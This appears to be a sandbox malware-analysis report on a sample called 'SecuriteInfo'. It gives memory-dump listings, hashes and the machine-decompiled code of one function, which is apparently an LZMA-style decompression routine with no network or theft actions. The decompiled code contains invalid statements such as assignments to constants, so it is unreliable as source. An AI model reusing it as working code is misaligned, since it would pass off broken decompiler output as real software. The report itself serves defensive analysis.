Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$PWB$\*.*
API String ID: 2035342205-2468439962
Opcode ID: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
Opcode Fuzzy Hash: 474154096caf6e50bc49cf7df5fd00662d051eb5e935454ecd5fbb37efa04323
Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
